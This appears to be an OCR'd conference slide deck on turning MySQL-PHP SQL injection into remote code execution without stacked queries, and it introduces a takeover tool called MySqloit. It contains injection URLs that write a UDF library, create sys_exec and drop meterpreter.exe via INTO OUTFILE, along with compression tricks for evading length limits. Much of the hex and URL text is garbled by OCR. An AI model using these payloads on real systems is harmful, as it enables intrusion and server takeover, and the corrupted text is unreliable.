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SQL Injection 



An attack technique used to exploit web sites that construct SQL 
statement from user input 



Normally it is used to read, modify and delete database data 
In some cases, it is able to perform remote code execution 
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What is a stacked query ? 



Condition where multiple SQL statements are allowed. SQL statements 
are separated by semicolon 

Stack query commonly used to write a file onto the machine while 
conducting SQL Injection attack 

Blackhat Amsterdam 2009, Bernando Damele demonstrated remote code 
execution performed through SQL injection on platforms with stacked 
query 

Today I will demonstrate how to conduct remote code execution through 
SQL injection without stacked query 

MySQL-PHP are widely use but stacked query is not allowed by default to 
security reason 
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Abusing stacked queries on MySQL 








query.aspx?id=21; create table temp(a blob); insert into temp 
values C0x789c 414141')-- 

query.aspx?id=21; update temp set a = replace (a, '414141', 
9775 710- 



query.aspx?id=21; select a from temp into dumpfile Vvar/lib/ 
mysql/lib/udf.so'-- 



query.aspx?id=21; create function sys_exec RETURNS int 
SONAME 'udf.so - 



Stacked query table 
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MSSQL 


Supported 


Supported 


Supported 


Postgresql 


Supported 


Supported 


Supported 
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Remote command execution on MySQL-PHP 



Traditionally, simple PHP shell is used to execute command 



Weak and has no strong functionality 



We need a reliable shell! 



Metasploit contains variety of shellcodes 
Meterpreter shellcode for post exploitation process 





VNC shellcode for GUI access on the host 
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File read/write access on MySQL-PHP platform 

■ SELECT .. LOADJNFILE is used to read file 

■ SELECT .. INTO OUTFILE/DUMPFILE is used to write file 

Remote code execution technique on MySQL-PHP 
platform 

■ Upload the compressed arbitrary file onto the web server 
directory 

■ Upload the PHP scripts onto the web server directory 

■ Execute the PHP Gzuncom press function to decompress the 
arbitrary file 




Execute the arbitrary file through the PHP System function 
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Challenge on writing arbitrary file through UNION 
SELECT 

■ GET request is limited to 8190 bytes on Apache 

May be smaller when Web Application firewall in use 



Data from the first query query can overwrite the file header 

Data from extra columns can add extra unnecesary data into our 
arbitrary data. This can potentially corrupt our file 
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Fixing the URL length issue 



PHP Zlib module can be used to compress the arbitrary file 

9625 bytes of executable can be compressed to 630 bytes 
which is able to bypass the max limit request 



Decompress the file on the destination before the arbitrary file is 
executed 
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Removal of unnecessary data 

UNION SELECT will combine the result from the first query with 




the second query 



query. php?id 



UNION SELECT 



34....3234,null,null- 



First Query 




Second Query 




Result from the first query can overwrite the file header 
Non existing data can be injected in the WHERE clause 
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Result from first query data + executable code 



¥ *8 1} 



■ ■■■■■ 

..:.. v v 



H http://192, 168,0, 101/defcon/output,php?question= 169 union select 0x789ced9acf6fl24114c7lfb0b4489a484df4aC 



« 



content 



defcon 



^ 



xoeisIoBAB 






iimE*nH J *.* r J ^ ,o*r_r v^fArViHfifTK3Mw+;w™uo£ui/_v T xH TVkj.^i ^(hhu. i SI, jnu J nll^ WJ / f7llll J Vi / Anfi^^cu J %*TAvXy,^ A Auillll''rr^iav 



First Query 



Executable code 



54 65 66 63 6F 6E 04 78 9C ED 91 
: 6 42 26 85 69 3C D8 90 85 5D 
24 A3 3F FE 5C 30 9C D9 9D 85 
30 53 IF 8E 84 58 85 C6 BB 37 



CF 6F 12 41 14 C7 IF B0 B4 48 94 48 4D F4 48 31 59 EB 8F 48 62 76 45 91 16 92 9E 

66 97 DD BO 63 89 93 7B E5 5C 62 E2 4D 7F 02 31 8D 89 E7 D6 44 87 72 FO EC 41 21 86 

7B Fl 42 97 F7 49 86 37 DF 79 DF 7D 33 08 C3 9E E6 D5 43 E2 E3 50 28 04 3E 61 88 5C 

Fl OC 88 20 40 12 62 10 85 DF 6E 47 88 Bl F6 71 03 80 B5 28 IB 4B 88 9B 3F 41 F4 E4 



defcofjx, 

,Q r l<.... 

..no..., 

i i i A i i i / 
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Fixing the columns issue 



In UNION SELECT, the second query required the same amount 
of columns as the first query 



Compressed arbitrary data should be injected in the first column 
to prevent data corruption 

Zlib uses Adler32 checksum and this value is added at the end of 
our compressed arbitrary data 

Any injected data after the Adler32 checksum will be ignored 
during the decompression process 




query.php?id=44444 UNION SELECT 

into outfile Vvar/www/upload/meterpreter.exe , 



3.. .43143 



,0x00,0x00, 
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Random data after the Adler32 checksum 



E6 36 3E 16 44 D8 CA E7 73 52 6C E 

\un\iwm 

5 E9 3C 2F FO 78 83 FB 82 7C FD 



55ECBE7f7F56597F8F(B5FiB 



115 IK5 EMI 12611 FEE 
18 3! S3 72 2i IE 21 5B 83 36 511 
CI 81 13 G E 83 01 82 78 18 E3 
[2FC17l3EI7D47767f6FEB! 

BFtBfB!I401FE8fFBBtE7727F47577B33B3EFEBEil' 

'!F83E5»E3F3S7251f3flBC7B4FECBFCflF4351i4FF 

8168153I7iF25B9SEEE18I5ll81l5IM74l5II35[ 

B7B57I 



71252EI5E4FBF2II 

2 1 EC 71 12 S3 13 1 55 Fl 

8FEE98B735FI8F8 

I8EI1BB4I1S53E 

73I1BS131IBC1571 

51 EA 9F F3 F5 BG 99 D7 69 C 

2JFF885535F7C855B 



] 

2157 

F3IC 

767EE 



3 
8E1B 



IS fMJ 



i .r.i i i i i i i i i 



2,f» |fl 



,f, 



1 1 1 1 i i i i 



id.E,< 
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.5 
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>]JII(,,{L.51J LA 

ii l111II.I1 



i 



Adler32 Checksum 
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Remote code execution on LAMP (Linux, Apache, MySQL, 
PHP) 

■ By default, any directory created in Linux is not writable by 
mysql /web server users 

■ When the mysql user has the ability to upload a file onto the 
web server directory, this directory can be used to upload our 
arbitrary file 

■ By default, uploaded file on the web server through INTO 
DUMPFILE is not executable but readable. This file is owned by a 
mysql user 

■ Read the file content as a web server user and write it back onto 
the web server directory 

■ Chmod the file to be executable and execute using the PHP 
system function 
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Remote code execution on WAMP (Windows, Apache, 
MySQL, PHP) 

■ By default, MySQL runs as a Local System user 

■ By default, this user has the ability to write into any directory 
including the web server directory 





Any new file created by this user is executable 



PHP system function can be used to execute this file 
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MySqloit 



MySqloit is a MySQL injection takeover tool 




Features 







SQL Injection detection - Detect SQL Injection through deep 
blind injection method 

Fingerprint Dir - Fingerprint the web server directory 

Fingerprint OS - Fingerprint the Operating System 

Payload - Create a shellcode using Metasploit 

Exploit - Upload the shellcode and execute it 
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Demo 
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MySqloit 
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Questions 7 
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Thank You 
muhaimindz@gmail.com 
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